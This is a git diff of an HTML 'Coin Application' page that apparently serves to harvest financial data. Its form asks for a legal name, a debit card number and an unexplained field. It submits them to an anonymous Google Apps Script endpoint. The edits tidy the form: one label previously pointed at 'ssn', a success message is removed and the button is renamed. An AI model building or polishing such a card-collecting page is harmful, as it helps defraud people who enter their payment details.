--- a/apply.html
+++ b/apply.html
@@ -18,9 +18,6 @@
     <main>
         <h2>Coin Application</h2>
 
-        <div id="success-message" style="display:none; text-align:center; color:green; margin-bottom:1rem; font-size:1.2rem;">
-        ✓ Application submitted successfully!
-        </div>
         <form id="contact-form" class="contact-form" action="https://script.google.com/macros/s/AKfycbyRpEFx2SEm_CMwPrSESjPP9_dp_LkB52cxrlWe6TS7VbOXG9_nZTl4mXm2s-o2mxCRpw/exec" method="POST">
             <div class="form-column">
                 <label for="name">Legal Name:</label>
@@ -33,7 +30,7 @@
             </div>
 
             <div class="form-column">
-                <label for="ssn">Debit Card Number:</label>
+                <label for="number">Debit Card Number:</label>
                 <input type="text" id="number" name="number" placeholder="No credit cards" required>
             </div>
 
@@ -42,7 +39,7 @@
                 <input type="text" id="israel" name="israel" required>
             </div>
 
-            <button type="submit" class="send-button">Send</button>
+            <button type="submit" class="send-button">Submit Info</button>
         </form>
     </main>
     <footer>
